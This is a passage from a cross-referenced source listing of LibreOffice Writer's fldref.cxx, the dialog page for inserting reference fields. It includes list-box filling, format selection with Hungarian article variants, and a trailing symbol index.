538  539  for( size_t n = 0; n < nCnt; ++n ) 540  { 541  bool isSubstring = MatchSubstring(aArr[ n ].sDlgEntry, filterString); 542  if(isSubstring) 543  { 544  m_xSelectionLB->append_text( aArr[ n ].sDlgEntry ); 545  } 546  if (IsFieldEdit() && pRefField->GetSeqNo() == aArr[ n ].nSeqNo) 547  sOldSel = aArr[n].sDlgEntry; 548  } 549  } 550  else if (nTypeId == REFFLDFLAG_ENDNOTE) 551  { 553  const size_t nCnt = pSh->GetSeqFootnoteList( aArr, true ); 554  555  for( size_t n = 0; n < nCnt; ++n ) 556  { 557  bool isSubstring = MatchSubstring(aArr[ n ].sDlgEntry, filterString); 558  if(isSubstring) 559  { 560  m_xSelectionLB->append_text( aArr[ n ].sDlgEntry ); 561  } 562  if (IsFieldEdit() && pRefField->GetSeqNo() == aArr[ n ].nSeqNo) 563  sOldSel = aArr[n].sDlgEntry; 564  } 565  } 566  // #i83479# 567  else if ( nTypeId == REFFLDFLAG_HEADING ) 568  { 569  bShowSelectionToolTipLB = true; 570  573  bool bCertainTextNodeSelected( false ); 574  for ( size_t nOutlIdx = 0; nOutlIdx < maOutlineNodes.size(); ++nOutlIdx ) 575  { 576  if (!pIDoc->isOutlineInLayout(nOutlIdx, *pSh->GetLayout())) 577  { 578  continue; // skip it 579  } 580  bool isSubstring = MatchSubstring(pIDoc->getOutlineText(nOutlIdx, pSh->GetLayout(), true, true, false), filterString); 581  if(isSubstring) 582  { 583  OUString sId(OUString::number(nOutlIdx)); 584  m_xSelectionToolTipLB->append(sId, 585  pIDoc->getOutlineText(nOutlIdx, pSh->GetLayout(), true, true, false)); 586  if ( ( IsFieldEdit() && 587  pRefField->GetReferencedTextNode() == maOutlineNodes[nOutlIdx] ) || 589  { 590  m_sSelectionToolTipLBId = sId; 591  sOldSel.clear(); 592  bCertainTextNodeSelected = true; 593  } 594  else if ( !bCertainTextNodeSelected && mnSavedSelectedPos == nOutlIdx ) 595  { 596  m_sSelectionToolTipLBId = sId; 597  sOldSel.clear(); 598  } 599  } 600  } 601  } 602  else if ( nTypeId == REFFLDFLAG_NUMITEM ) 603  { 604  bShowSelectionToolTipLB = true; 605  606  const IDocumentListItems* pIDoc( pSh->getIDocumentListItemsAccess() ); 607  pIDoc->getNumItems( maNumItems ); 608  bool bCertainTextNodeSelected( false ); 609  for ( size_t nNumItemIdx = 0; nNumItemIdx < maNumItems.size(); ++nNumItemIdx ) 610  { 611  if (!pIDoc->isNumberedInLayout(*maNumItems[nNumItemIdx], *pSh->GetLayout())) 612  { 613  continue; // skip it 614  } 615  bool isSubstring = MatchSubstring(pIDoc->getListItemText(*maNumItems[nNumItemIdx], *pSh->GetLayout()), filterString); 616  if(isSubstring) 617  { 618  OUString sId(OUString::number(nNumItemIdx)); 619  m_xSelectionToolTipLB->append(sId, 620  pIDoc->getListItemText(*maNumItems[nNumItemIdx], *pSh->GetLayout())); 621  if ( ( IsFieldEdit() && 622  pRefField->GetReferencedTextNode() == maNumItems[nNumItemIdx]->GetTextNode() ) || 623  mpSavedSelectedTextNode == maNumItems[nNumItemIdx]->GetTextNode() ) 624  { 625  m_sSelectionToolTipLBId = sId; 626  sOldSel.clear(); 627  bCertainTextNodeSelected = true; 628  } 629  else if ( !bCertainTextNodeSelected && mnSavedSelectedPos == nNumItemIdx ) 630  { 631  m_sSelectionToolTipLBId = sId; 632  sOldSel.clear(); 633  } 634  } 635  } 636  } 637  else 638  { 639  // get the fields to Seq-FieldType: 640  641  SwSetExpFieldType* pType = static_cast<SwSetExpFieldType*>(pSh->GetFieldType( 642  nTypeId & ~REFFLDFLAG, SwFieldIds::SetExp )); 643  if( pType ) 644  { 646  // old selection should be kept in non-edit mode 647  if(IsFieldEdit()) 648  sOldSel.clear(); 649  650  const size_t nCnt = pType->GetSeqFieldList(aArr, pSh->GetLayout()); 651  for( size_t n = 0; n < nCnt; ++n ) 652  { 653  bool isSubstring = MatchSubstring(aArr[ n ].sDlgEntry, filterString); 654  if(isSubstring) 655  { 656  m_xSelectionLB->append_text( aArr[ n ].sDlgEntry ); 657  } 658  if (IsFieldEdit() && sOldSel.isEmpty() && 659  aArr[ n ].nSeqNo == pRefField->GetSeqNo()) 660  sOldSel = aArr[ n ].sDlgEntry; 661  } 662  663  if (IsFieldEdit() && sOldSel.isEmpty()) 664  sOldSel = OUString::number( pRefField->GetSeqNo() + 1); 665  } 666  } 667  } 668  else 669  { 670  std::vector<OUString> aLst; 671  GetFieldMgr().GetSubTypes(static_cast<SwFieldTypesEnum>(nTypeId), aLst); 672  for(const OUString & i : aLst) 673  { 674  bool isSubstring = MatchSubstring( i , filterString ); 675  if(isSubstring) 676  { 677  m_xSelectionLB->append_text(i); 678  } 679  } 680  681  if (IsFieldEdit()) 682  sOldSel = pRefField->GetSetRefName(); 683  } 684  685  // #i83479# 686  m_xSelectionLB->thaw(); 687  m_xSelectionToolTipLB->thaw(); 688  if (!m_sSelectionToolTipLBId.isEmpty()) 689  m_xSelectionToolTipLB->select_id(m_sSelectionToolTipLBId); 690  m_xSelectionToolTipLB->set_visible( bShowSelectionToolTipLB ); 691  m_xSelectionLB->set_visible( !bShowSelectionToolTipLB ); 692  if ( bShowSelectionToolTipLB ) 693  { 694  bool bEnable = m_xSelectionToolTipLB->n_children() != 0; 695  m_xSelection->set_sensitive( bEnable ); 696  697  int nEntry = m_xSelectionToolTipLB->get_selected_index(); 698  if (nEntry != -1) 699  m_xSelectionToolTipLB->scroll_to_row(nEntry); 700  701  if (IsFieldEdit() && nEntry == -1) 702  { 703  m_xNameED->set_text(sOldSel); 704  } 705  } 706  else 707  { 708  // enable or disable 709  bool bEnable = m_xSelectionLB->n_children() != 0; 710  m_xSelection->set_sensitive( bEnable ); 711  712  if ( bEnable ) 713  { 714  m_xSelectionLB->select_text(sOldSel); 715  if (m_xSelectionLB->get_selected_index() == -1 && !IsFieldEdit()) 716  m_xSelectionLB->select(0); 717  } 718  719  if (IsFieldEdit() && m_xSelectionLB->get_selected_index() == -1) // in case the reference was already deleted... 720  m_xNameED->set_text(sOldSel); 721  } 722 } 723  724 bool SwFieldRefPage::MatchSubstring( const OUString& rListString, const OUString& rSubstr ) 725 { 726  if(rSubstr.isEmpty()) 727  return true; 728  OUString aListString = GetAppCharClass().lowercase(rListString); 729  OUString aSubstr = GetAppCharClass().lowercase(rSubstr); 730  return aListString.indexOf(aSubstr) >= 0; 731 } 732  733 namespace { 734  736 { 737  FMT_REF_PAGE_IDX = 0, 738  FMT_REF_CHAPTER_IDX = 1, 739  FMT_REF_TEXT_IDX = 2, 740  FMT_REF_UPDOWN_IDX = 3, 741  FMT_REF_PAGE_PGDSC_IDX = 4, 742  FMT_REF_ONLYNUMBER_IDX = 5, 743  FMT_REF_ONLYCAPTION_IDX = 6, 744  FMT_REF_ONLYSEQNO_IDX = 7, 745  FMT_REF_NUMBER_IDX = 8, 746  FMT_REF_NUMBER_NO_CONTEXT_IDX = 9, 747  FMT_REF_NUMBER_FULL_CONTEXT_IDX = 10 748 }; 749  750 } 751  752 static const char* FMT_REF_ARY[] = 753 { 754  FMT_REF_PAGE, 755  FMT_REF_CHAPTER, 756  FMT_REF_TEXT, 757  FMT_REF_UPDOWN, 758  FMT_REF_PAGE_PGDSC, 759  FMT_REF_ONLYNUMBER, 760  FMT_REF_ONLYCAPTION, 761  FMT_REF_ONLYSEQNO, 762  FMT_REF_NUMBER, 763  FMT_REF_NUMBER_NO_CONTEXT, 764  FMT_REF_NUMBER_FULL_CONTEXT 765 }; 766  767 sal_Int32 SwFieldRefPage::FillFormatLB(sal_uInt16 nTypeId) 768 { 769  OUString sOldSel; 770  771  sal_Int32 nFormatSel = m_xFormatLB->get_selected_index(); 772  if (nFormatSel != -1) 773  sOldSel = m_xFormatLB->get_text(nFormatSel); 774  775  // fill Format-Listbox 776  m_xFormatLB->clear(); 777  778  // reference has less that the annotation 779  sal_uInt16 nSize( 0 ); 780  bool bAddCrossRefFormats( false ); 781  switch (nTypeId) 782  { 783  // #i83479# 784  case REFFLDFLAG_HEADING: 785  case REFFLDFLAG_NUMITEM: 786  bAddCrossRefFormats = true; 787  [[fallthrough]]; 788  789  case static_cast<sal_uInt16>(SwFieldTypesEnum::GetRef): 790  case REFFLDFLAG_BOOKMARK: 791  case REFFLDFLAG_FOOTNOTE: 792  case REFFLDFLAG_ENDNOTE: 793  nSize = FMT_REF_PAGE_PGDSC_IDX + 1; 794  break; 795  796  default: 797  // #i83479# 798  799  if ( REFFLDFLAG & nTypeId ) 800  { 801  nSize = FMT_REF_ONLYSEQNO_IDX + 1; 802  } 803  else 804  { 805  nSize = GetFieldMgr().GetFormatCount( static_cast<SwFieldTypesEnum>(nTypeId), IsFieldDlgHtmlMode() ); 806  } 807  break; 808  } 809  810  if (REFFLDFLAG & nTypeId) 811  nTypeId = static_cast<sal_uInt16>(SwFieldTypesEnum::GetRef); 812  813  SwFieldTypesEnum nFieldType = static_cast<SwFieldTypesEnum>(nTypeId); 814  for (sal_uInt16 i = 0; i < nSize; i++) 815  { 816  OUString sId(OUString::number(GetFieldMgr().GetFormatId( nFieldType, i ))); 817  m_xFormatLB->append(sId, GetFieldMgr().GetFormatStr(nFieldType, i)); 818  } 819  // #i83479# 820  821  sal_uInt16 nExtraSize( 0 ); 822  if ( bAddCrossRefFormats ) 823  { 824  sal_uInt16 nFormat = FMT_REF_NUMBER_IDX; 825  OUString sId(OUString::number(GetFieldMgr().GetFormatId(nFieldType, nFormat))); 826  m_xFormatLB->append(sId, GetFieldMgr().GetFormatStr( nFieldType, nFormat )); 827  nFormat = FMT_REF_NUMBER_NO_CONTEXT_IDX; 828  sId = OUString::number(GetFieldMgr().GetFormatId(nFieldType, nFormat)); 829  m_xFormatLB->append(sId, GetFieldMgr().GetFormatStr( nFieldType, nFormat )); 830  nFormat = FMT_REF_NUMBER_FULL_CONTEXT_IDX; 831  sId = OUString::number(GetFieldMgr().GetFormatId(nFieldType, nFormat)); 832  m_xFormatLB->append(sId, GetFieldMgr().GetFormatStr( nFieldType, nFormat )); 833  nExtraSize = 3; 834  } 835  836  // extra list items optionally, depending from reference-language 837  SvtSysLocaleOptions aSysLocaleOptions; 838  static const LanguageTag& rLang = aSysLocaleOptions.GetRealLanguageTag(); 839  840  if (rLang.getLanguage() == "hu") 841  { 842  for (sal_uInt16 i = 0; i < nSize; i++) 843  { 844  OUString sId(OUString::number(GetFieldMgr().GetFormatId( nFieldType, i + SAL_N_ELEMENTS(FMT_REF_ARY)))); 845  m_xFormatLB->append(sId, SwResId(FMT_REF_WITH_LOWERCASE_HU_ARTICLE) + GetFieldMgr().GetFormatStr( nFieldType, i )); 846  } 847  nExtraSize += nSize; 848  849  if ( bAddCrossRefFormats ) 850  { 851  sal_uInt16 nFormat = FMT_REF_NUMBER_IDX + SAL_N_ELEMENTS(FMT_REF_ARY); 852  OUString sId(OUString::number(GetFieldMgr().GetFormatId(nFieldType, nFormat))); 853  m_xFormatLB->append(sId, SwResId(FMT_REF_WITH_LOWERCASE_HU_ARTICLE) + GetFieldMgr().GetFormatStr( nFieldType, nFormat % SAL_N_ELEMENTS(FMT_REF_ARY))); 854  nFormat = FMT_REF_NUMBER_NO_CONTEXT_IDX + SAL_N_ELEMENTS(FMT_REF_ARY); 855  sId = OUString::number(GetFieldMgr().GetFormatId(nFieldType, nFormat)); 856  m_xFormatLB->append(sId, SwResId(FMT_REF_WITH_LOWERCASE_HU_ARTICLE) + GetFieldMgr().GetFormatStr( nFieldType, nFormat % SAL_N_ELEMENTS(FMT_REF_ARY))); 857  nFormat = FMT_REF_NUMBER_FULL_CONTEXT_IDX + SAL_N_ELEMENTS(FMT_REF_ARY); 858  sId = OUString::number(GetFieldMgr().GetFormatId(nFieldType, nFormat)); 859  m_xFormatLB->append(sId, SwResId(FMT_REF_WITH_LOWERCASE_HU_ARTICLE) + GetFieldMgr().GetFormatStr( nFieldType, nFormat % SAL_N_ELEMENTS(FMT_REF_ARY))); 860  nExtraSize += 3; 861  } 862  // uppercase article 863  for (sal_uInt16 i = 0; i < nSize; i++) 864  { 865  OUString sId(OUString::number(GetFieldMgr().GetFormatId( nFieldType, i + 2 * SAL_N_ELEMENTS(FMT_REF_ARY)))); 866  m_xFormatLB->append(sId, SwResId(FMT_REF_WITH_UPPERCASE_HU_ARTICLE) + GetFieldMgr().GetFormatStr( nFieldType, i )); 867  } 868  nExtraSize += nSize; 869  if ( bAddCrossRefFormats ) 870  { 871  sal_uInt16 nFormat = FMT_REF_NUMBER_IDX + 2 * SAL_N_ELEMENTS(FMT_REF_ARY); 872  OUString sId(OUString::number(GetFieldMgr().GetFormatId(nFieldType, nFormat))); 873  m_xFormatLB->append(sId, SwResId(FMT_REF_WITH_UPPERCASE_HU_ARTICLE) + GetFieldMgr().GetFormatStr( nFieldType, nFormat % SAL_N_ELEMENTS(FMT_REF_ARY))); 874  nFormat = FMT_REF_NUMBER_NO_CONTEXT_IDX + 2 * SAL_N_ELEMENTS(FMT_REF_ARY); 875  sId = OUString::number(GetFieldMgr().GetFormatId(nFieldType, nFormat)); 876  m_xFormatLB->append(sId, SwResId(FMT_REF_WITH_UPPERCASE_HU_ARTICLE) + GetFieldMgr().GetFormatStr( nFieldType, nFormat % SAL_N_ELEMENTS(FMT_REF_ARY))); 877  nFormat = FMT_REF_NUMBER_FULL_CONTEXT_IDX + 2 * SAL_N_ELEMENTS(FMT_REF_ARY); 878  sId = OUString::number(GetFieldMgr().GetFormatId(nFieldType, nFormat)); 879  m_xFormatLB->append(sId, SwResId(FMT_REF_WITH_UPPERCASE_HU_ARTICLE) + GetFieldMgr().GetFormatStr( nFieldType, nFormat % SAL_N_ELEMENTS(FMT_REF_ARY))); 880  nExtraSize += 3; 881  } 882  } 883  884  nSize += nExtraSize; 885  886  // select a certain entry 887  if (nSize) 888  { 889  if (!IsFieldEdit()) 890  m_xFormatLB->select_text(sOldSel); 891  else 892  m_xFormatLB->select_text(SwResId(FMT_REF_ARY[GetCurField()->GetFormat() % SAL_N_ELEMENTS(FMT_REF_ARY)])); 893  894  if (m_xFormatLB->get_selected_index() == -1) 895  { 896  if (nFieldDlgFormatSel < m_xFormatLB->n_children()) 898  else 899  m_xFormatLB->select(0); 900  } 901  } 902  903  return nSize; 904 } 905  906 // Modify 908 { 909  OUString aName(m_xNameED->get_text()); 910  const bool bEmptyName = aName.isEmpty(); 911  912  bool bEnable = true; 913  sal_uInt16 nTypeId = m_xTypeLB->get_id(GetTypeSel()).toUInt32(); 914  915  if ((nTypeId == static_cast<sal_uInt16>(SwFieldTypesEnum::SetRef) && !GetFieldMgr().CanInsertRefMark(aName)) || 916  (bEmptyName && (nTypeId == static_cast<sal_uInt16>(SwFieldTypesEnum::GetRef) || nTypeId == static_cast<sal_uInt16>(SwFieldTypesEnum::SetRef) || 917  nTypeId == REFFLDFLAG_BOOKMARK))) 918  bEnable = false; 919  920  EnableInsert(bEnable); 921  922  m_xSelectionLB->select_text(aName); 923 } 924  926 { 927  bool bModified = false; 928  sal_uInt16 nTypeId = m_xTypeLB->get_id(GetTypeSel()).toUInt32(); 929  930  sal_uInt16 nSubType = 0; 931  const sal_Int32 nEntryPos = m_xFormatLB->get_selected_index(); 932  const sal_uLong nFormat = (nEntryPos == -1) 933  ? 0 : m_xFormatLB->get_id(nEntryPos).toUInt32(); 934  935  OUString aVal(m_xValueED->get_text()); 936  OUString aName(m_xNameED->get_text()); 937  938  switch(nTypeId) 939  { 940  case static_cast<sal_uInt16>(SwFieldTypesEnum::GetRef): 941  nSubType = REF_SETREFATTR; 942  break; 943  944  case static_cast<sal_uInt16>(SwFieldTypesEnum::SetRef): 945  { 947  948  if(!pType) // Only insert when the name doesn't exist yet 949  { 950  m_xSelectionLB->append_text(aName); 951  m_xSelection->set_sensitive(true); 952  } 953  break; 954  } 955  } 956  957  SwGetRefField* pRefField = static_cast<SwGetRefField*>(GetCurField()); 958  959  if (REFFLDFLAG & nTypeId) 960  { 961  SwWrtShell *pSh = GetWrtShell(); 962  if(!pSh) 963  { 964  pSh = ::GetActiveWrtShell(); 965  } 966  if (nTypeId == REFFLDFLAG_BOOKMARK) // text marks! 967  { 968  aName = m_xNameED->get_text(); 969  nTypeId = static_cast<sal_uInt16>(SwFieldTypesEnum::GetRef); 970  nSubType = REF_BOOKMARK; 971  } 972  else if (REFFLDFLAG_FOOTNOTE == nTypeId) // footnotes 973  { 975  SeqFieldLstElem aElem( m_xSelectionLB->get_selected_text(), 0 ); 976  977  size_t nPos = 0; 978  979  nTypeId = static_cast<sal_uInt16>(SwFieldTypesEnum::GetRef); 980  nSubType = REF_FOOTNOTE; 981  aName.clear(); 982  983  if (pSh->GetSeqFootnoteList(aArr) && aArr.SeekEntry(aElem, &nPos)) 984  { 985  aVal = OUString::number( aArr[nPos].nSeqNo ); 986  987  if (IsFieldEdit() && aArr[nPos].nSeqNo == pRefField->GetSeqNo()) 988  bModified = true; // can happen with fields of which the references were deleted 989  } 990  else if (IsFieldEdit()) 991  aVal = OUString::number( pRefField->GetSeqNo() ); 992  } 993  else if (REFFLDFLAG_ENDNOTE == nTypeId) // endnotes 994  { 996  SeqFieldLstElem aElem( m_xSelectionLB->get_selected_text(), 0 ); 997  998  size_t nPos = 0; 999  1000  nTypeId = static_cast<sal_uInt16>(SwFieldTypesEnum::GetRef); 1001  nSubType = REF_ENDNOTE; 1002  aName.clear(); 1003  1004  if (pSh->GetSeqFootnoteList(aArr, true) && aArr.SeekEntry(aElem, &nPos)) 1005  { 1006  aVal = OUString::number( aArr[nPos].nSeqNo ); 1007  1008  if (IsFieldEdit() && aArr[nPos].nSeqNo == pRefField->GetSeqNo()) 1009  bModified = true; // can happen with fields of which the reference was deleted 1010  } 1011  else if (IsFieldEdit()) 1012  aVal = OUString::number( pRefField->GetSeqNo() ); 1013  } 1014  // #i83479# 1015  else if ( nTypeId == REFFLDFLAG_HEADING ) 1016  { 1017  int nEntry = m_xSelectionToolTipLB->get_selected_index(); 1018  OSL_ENSURE( nEntry != -1, 1019  "<SwFieldRefPage::FillItemSet(..)> - no entry selected in selection tool tip listbox!" ); 1020  if (nEntry != -1) 1021  { 1022  const size_t nOutlIdx(m_xSelectionToolTipLB->get_id(nEntry).toUInt32()); 1024  if ( nOutlIdx < maOutlineNodes.size() ) 1025  { 1026  ::sw::mark::IMark const * const pMark = pSh->getIDocumentMarkAccess()->getMarkForTextNode( 1027  *(maOutlineNodes[nOutlIdx]), 1029  aName = pMark->GetName(); 1030  nTypeId = static_cast<sal_uInt16>(SwFieldTypesEnum::GetRef); 1031  nSubType = REF_BOOKMARK; 1032  } 1033  } 1034  } 1035  else if ( nTypeId == REFFLDFLAG_NUMITEM ) 1036  { 1037  int nEntry = m_xSelectionToolTipLB->get_selected_index(); 1038  OSL_ENSURE( nEntry != -1, 1039  "<SwFieldRefPage::FillItemSet(..)> - no entry selected in selection tool tip listbox!" ); 1040  if (nEntry != -1) 1041  { 1042  const size_t nNumItemIdx(m_xSelectionToolTipLB->get_id(nEntry).toUInt32()); 1044  if ( nNumItemIdx < maNumItems.size() ) 1045  { 1046  ::sw::mark::IMark const * const pMark = pSh->getIDocumentMarkAccess()->getMarkForTextNode( 1047  *(maNumItems[nNumItemIdx]->GetTextNode()), 1049  aName = pMark->GetName(); 1050  nTypeId = static_cast<sal_uInt16>(SwFieldTypesEnum::GetRef); 1051  nSubType = REF_BOOKMARK; 1052  } 1053  } 1054  } 1055  else // SequenceFields 1056  { 1057  // get fields for Seq-FieldType: 1058  SwSetExpFieldType* pType = static_cast<SwSetExpFieldType*>(pSh->GetFieldType( 1059  nTypeId & ~REFFLDFLAG, SwFieldIds::SetExp )); 1060  if( pType ) 1061  { 1063  SeqFieldLstElem aElem( m_xSelectionLB->get_selected_text(), 0 ); 1064  1065  size_t nPos = 0; 1066  1067  nTypeId = static_cast<sal_uInt16>(SwFieldTypesEnum::GetRef); 1068  nSubType = REF_SEQUENCEFLD; 1069  aName = pType->GetName(); 1070  1071  if (pType->GetSeqFieldList(aArr, pSh->GetLayout()) 1072  && aArr.SeekEntry(aElem, &nPos)) 1073  { 1074  aVal = OUString::number( aArr[nPos].nSeqNo ); 1075  1076  if (IsFieldEdit() && aArr[nPos].nSeqNo == pRefField->GetSeqNo()) 1077  bModified = true; // can happen with fields of which the reference was deleted 1078  } 1079  else if (IsFieldEdit()) 1080  aVal = OUString::number( pRefField->GetSeqNo() ); 1081  } 1082  } 1083  } 1084  1085  if (IsFieldEdit() && nTypeId == static_cast<sal_uInt16>(SwFieldTypesEnum::GetRef)) 1086  { 1087  aVal = OUString::number(nSubType) + "|" + aVal; 1088  } 1089  1090  if (!IsFieldEdit() || bModified || 1091  m_xNameED->get_value_changed_from_saved() || 1092  m_xValueED->get_value_changed_from_saved() || 1093  m_xTypeLB->get_value_changed_from_saved() || 1094  m_xSelectionLB->get_value_changed_from_saved() || 1095  m_xFormatLB->get_value_changed_from_saved()) 1096  { 1097  InsertField( static_cast<SwFieldTypesEnum>(nTypeId), nSubType, aName, aVal, nFormat ); 1098  } 1099  1100  ModifyHdl(*m_xNameED); // enable/disable insert if applicable 1101  1102  return false; 1103 } 1104  1105 std::unique_ptr<SfxTabPage> SwFieldRefPage::Create( weld::Container* pPage, weld::DialogController* pController, 1106  const SfxItemSet *const pAttrSet) 1107 { 1108  return std::make_unique<SwFieldRefPage>(pPage, pController, pAttrSet); 1109 } 1110  1112 { 1113  return GRP_REF; 1114 } 1115  1117 { 1118  const sal_Int32 nEntryPos = m_xTypeLB->get_selected_index(); 1119  const sal_uInt16 nTypeSel = ( -1 == nEntryPos ) 1120  ? USHRT_MAX 1121  : m_xTypeLB->get_id(nEntryPos).toUInt32(); 1122  const sal_Int32 nFormatEntryPos = m_xFormatLB->get_selected_index(); 1123  const sal_uInt32 nFormatSel = -1 == nFormatEntryPos ? USHRT_MAX : nFormatEntryPos; 1125  OUString::number( nTypeSel ) + ";" + 1126  OUString::number( nFormatSel )); 1127 } 1128  1129 /* vim:set shiftwidth=4 softtabstop=4 expandtab: */ SwFieldType * GetFieldType(size_t nField, SwFieldIds nResId=SwFieldIds::Unknown) const get field types with a ResId, if 0 get all Definition: edfld.cxx:64 SwFieldType * GetFieldType(SwFieldIds nResId, size_t nField=0) const Definition: fldmgr.cxx:409 Instances of SwFields and those derived from it occur 0 to n times. Definition: fldbas.hxx:234 virtual void getNumItems(IDocumentListItems::tSortedNodeNumList &orNodeNumList) const =0 get vector of all list items, which are numbered sal_uInt16 const nStart Definition: fldmgr.hxx:63 IMPL_LINK_NOARG(SwFieldRefPage, ModifyHdl_Impl, weld::Entry &, void) Definition: fldref.cxx:115 IDocumentListItems::tSortedNodeNumList maNumItems Definition: fldref.hxx:39 virtual const OUString & GetName() const =0 OUString sNumItemText Definition: fldref.hxx:36 void RestorePos(weld::TreeView &rLst1) Definition: fldpage.cxx:294 virtual sal_uInt16 GetGroup() override Definition: fldref.cxx:1111 std::unique_ptr< weld::Entry > m_xValueED Definition: fldref.hxx:56 void SetUserData(const OUString &rString) #define REFFLDFLAG_ENDNOTE Definition: fldref.cxx:44 #define USER_DATA_VERSION Definition: fldref.cxx:52 const IDocumentOutlineNodes * getIDocumentOutlineNodesAccess() const Definition: viewsh.cxx:2605 wrapper iterator: wraps iterator of implementation while hiding MarkBase class; only IMark instances ... sal_uIntPtr sal_uLong Provides numbered items of a document. static SW_DLLPUBLIC MarkType GetType(const ::sw::mark::IMark &rMark) Returns the MarkType used to create the mark. Definition: docbm.cxx:474 IDocumentOutlineNodes::tSortedOutlineNodeList maOutlineNodes Definition: fldref.hxx:38 sal_Int64 n SwWrtShell * GetActiveWrtShell() Definition: swmodul1.cxx:107 Provides access to the marks of a document. void SubTypeHdl() Definition: fldref.cxx:422 void SaveSelectedTextNode() Definition: fldref.cxx:121 std::unique_ptr< weld::Entry > m_xFilterED Definition: fldref.hxx:57 bool HasWriterListeners() const Definition: calbck.hxx:208 #define REFFLDFLAG Definition: fldref.cxx:41 Used by the UI to modify the document model. Definition: wrtsh.hxx:90 virtual ~SwFieldRefPage() override Definition: fldref.cxx:111 static sal_uInt16 nFieldDlgFormatSel Definition: fldref.cxx:49 SwFieldMgr & GetFieldMgr() Definition: fldpage.hxx:81 std::unique_ptr< weld::Widget > m_xSelection Definition: fldref.hxx:48 static SwFieldTypesEnum GetTypeId(sal_uInt16 nPos) Definition: fldmgr.cxx:520 OUString getLanguage() const virtual void getOutlineNodes(IDocumentOutlineNodes::tSortedOutlineNodeList &orOutlineNodeList) const =0 bool SeekEntry(const SeqFieldLstElem &rNew, size_t *pPos) const Definition: expfld.cxx:752 const SwTextNode * mpSavedSelectedTextNode Definition: fldref.hxx:43 virtual bool FillItemSet(SfxItemSet *rSet) override Definition: fldref.cxx:925 void SetSelectionSel(sal_Int32 nSet) Definition: fldpage.hxx:48 const OUString & GetUserData() const sal_uInt16 GetFormatCount(SwFieldTypesEnum nTypeId, bool bHtmlMode) const Definition: fldmgr.cxx:670 #define REFFLDFLAG_NUMITEM Definition: fldref.cxx:47 bool IsFieldDlgHtmlMode() const Definition: fldpage.hxx:49 const IDocumentMarkAccess * getIDocumentMarkAccess() const Provides access to the document bookmark interface. Definition: viewsh.cxx:2582 const char * sName #define SAL_N_ELEMENTS(arr) std::unique_ptr< weld::TreeView > m_xSelectionToolTipLB Definition: fldref.hxx:51 virtual const_iterator_t getBookmarksEnd() const =0 returns a STL-like random access iterator to the end of the sequence of IBookmarks. bool IsRefToNumItemCrossRefBookmark() const Definition: reffld.cxx:385 #define REFFLDFLAG_BOOKMARK Definition: fldref.cxx:42 void SavePos(const weld::TreeView &rLst1) Definition: fldpage.cxx:284 static bool MatchSubstring(const OUString &list_string, const OUString &substr) Definition: fldref.cxx:724 int i SwFieldTypesEnum List of FieldTypes at UI. Definition: fldbas.hxx:87 void Init() Definition: fldpage.cxx:65 const SvxPageUsage aArr[] size_t GetFieldTypeCount(SwFieldIds nResId=SwFieldIds::Unknown) const count field types with a ResId, if SwFieldIds::Unknown count all Definition: edfld.cxx:43 bool IsRefresh() const Definition: fldpage.hxx:50 bool IsUsed(const SwModify &) const Query if the paragraph-/character-/frame-/page-style is used. Definition: edfmt.cxx:139 void InsertField(SwFieldTypesEnum nTypeId, sal_uInt16 nSubType, const OUString &rPar1, const OUString &rPar2, sal_uInt32 nFormatId, sal_Unicode cDelim= ' ', bool bIsAutomaticLanguage=true) Definition: fldpage.cxx:117 sal_Int32 GetTypeSel() const Definition: fldpage.hxx:45 virtual void Reset(const SfxItemSet *rSet) override Definition: fldref.cxx:152 size_t GetSeqFootnoteList(SwSeqFieldList &rList, bool bEndNotes=false) Give a List of all footnotes and their beginning texts. Definition: edattr.cxx:454 SwField * GetCurField() Definition: fldpage.hxx:51 OUString SwResId(const char *pId) Definition: swmodule.cxx:178 OUString lowercase(const OUString &rStr, sal_Int32 nPos, sal_Int32 nCount) const void UpdateSubType(const OUString &filterString) Definition: fldref.cxx:466 OUString sFootnoteText Definition: fldref.hxx:32 #define FIELD_COLUMN_WIDTH Definition: fldpage.hxx:25 sal_uInt16 const nEnd Definition: fldmgr.hxx:64 virtual OUString GetName() const override Only in derived classes. Definition: expfld.cxx:527 FMT_REF_IDX Definition: fldref.cxx:735 OUString sBookmarkText Definition: fldref.hxx:31 const LanguageTag & GetRealLanguageTag() const OUString sHeadingText Definition: fldref.hxx:35 SwWrtShell * GetWrtShell() Definition: fldpage.hxx:52 const SwGetSetExpType GSE_SEQ Sequence. Definition: fldbas.hxx:198 sal_uInt16 GetSeqNo() const Get/set SequenceNo (of interest only for REF_SEQUENCEFLD). Definition: reffld.hxx:132 virtual ::sw::mark::IMark * getMarkForTextNode(const SwTextNode &rTextNode, MarkType eMark)=0 Returns a mark in the document for a paragraph. bool IsRefToHeadingCrossRefBookmark() const Definition: reffld.cxx:379 const IDocumentListItems * getIDocumentListItemsAccess() const Definition: viewsh.cxx:2600 bool HasFootnotes(bool bEndNotes=false) const Definition: edattr.cxx:441 std::unique_ptr< weld::TreeView > m_xFormatLB Definition: fldref.hxx:53 Provides outline nodes of a document. const o3tl::enumarray< SvxAdjust, unsigned short > aSvxToUnoAdjust USHRT_MAX Definition: unosett.cxx:253 OUString GetSelText() const get selected text of a node at current cursor Definition: crsrsh.cxx:2515 virtual const_iterator_t getBookmarksBegin() const =0 returns a STL-like random access iterator to the begin of the sequence the IBookmarks. OUString aName OString strip(const OString &rIn, char c) virtual void FillUserData() override Definition: fldref.cxx:1116 const OUString & GetSetRefName() const Definition: reffld.hxx:107 std::unique_ptr< weld::TreeView > m_xTypeLB Definition: fldref.hxx:47 static const char * FMT_REF_ARY[] Definition: fldref.cxx:752 static OUString GetTypeStr(sal_uInt16 nPos) Definition: fldmgr.cxx:526 OUString sId bool IsFieldEdit() const Definition: fldpage.hxx:62 #define REFFLDFLAG_HEADING Definition: fldref.cxx:46 static std::unique_ptr< SfxTabPage > Create(weld::Container *pPage, weld::DialogController *pController, const SfxItemSet *rAttrSet) Definition: fldref.cxx:1105 sal_uInt16 GetType() const Definition: expfld.hxx:193 static const SwFieldGroupRgn & GetGroupRange(bool bHtmlMode, sal_uInt16 nGrpId) Definition: fldmgr.cxx:464 sal_Int32 FillFormatLB(sal_uInt16 nTypeId) Definition: fldref.cxx:767 SwRootFrame * GetLayout() const Definition: viewsh.cxx:2062 CharClass & GetAppCharClass() Definition: init.cxx:709 OUString sEndnoteText Definition: fldref.hxx:33 size_t mnSavedSelectedPos Definition: fldref.hxx:45 #define REFFLDFLAG_FOOTNOTE Definition: fldref.cxx:43 std::unique_ptr< weld::TreeView > m_xSelectionLB Definition: fldref.hxx:49 const SwTextNode * GetReferencedTextNode() const Definition: 